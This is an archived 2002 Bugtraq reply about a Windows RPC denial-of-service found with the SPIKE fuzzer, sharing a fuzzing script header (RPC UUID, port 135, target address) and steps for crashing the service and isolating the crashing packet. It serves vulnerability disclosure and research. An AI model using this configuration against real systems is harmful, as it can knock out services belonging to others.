[27568] in bugtraq
Re: MS WIN RPC DoS CODE FROM SPIKE v2.7
daemon@ATHENA.MIT.EDU (Dave Aitel)
Tue Oct 22 20:02:19 2002
From: Dave Aitel <dave@immunitysec.com>
To: lion <lion@cnhonker.net>
In-Reply-To: <20021022181916.16432.qmail@securityfocus.com>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-YyZRocJYTR24bjfWxQIu"
Message-Id: <1035318066.3355.34.camel@www.immunitysec.com>
Mime-Version: 1.0
Date: 22 Oct 2002 16:21:06 -0400
--=-YyZRocJYTR24bjfWxQIu
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
There are questions about whether this vulnerability works if you have
large enough amount of free memory. My exploit is tuned for my machine's
amount of free memory (not much), but there are variations that work on
any amount.
For those who are interested, here is my domsrpcfuzz.sh header I used to
find this attack.=20
MAX=3D35
UUID=3Db9e79e60-3d52-11ce-aaa1-00006901293f
#using incorrect versionmajor for bonus fun!
VERSIONMAJOR=3D2
VERSIONMINOR=3D2
PORT=3D135
TARGET=3D192.168.1.100
STARTFUNCTION=3D0
Just copy that in, and let it run for a while. When it crashes, look at
your output file and it will have the random seed that crashed it. Then
you can do some more work to manually isolate the exact packet or
sequence that crashes it.
On Tue, 2002-10-22 at 14:25, lion wrote:
> *
> * MS WIN RPC DoS CODE FROM SPIKE v2.7
> *
--=20
Dave Aitel <dave@immunitysec.com>
Immunity, Inc
--=-YyZRocJYTR24bjfWxQIu
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQA9tbMyB8JNm+PA+iURApqrAKCXuOnsYIwLJdv+YFVNB3I8wAgaPQCg53BM
ePMpSRpYvfkhVqMtDPrUVhs=
=2qgk
-----END PGP SIGNATURE-----
--=-YyZRocJYTR24bjfWxQIu--
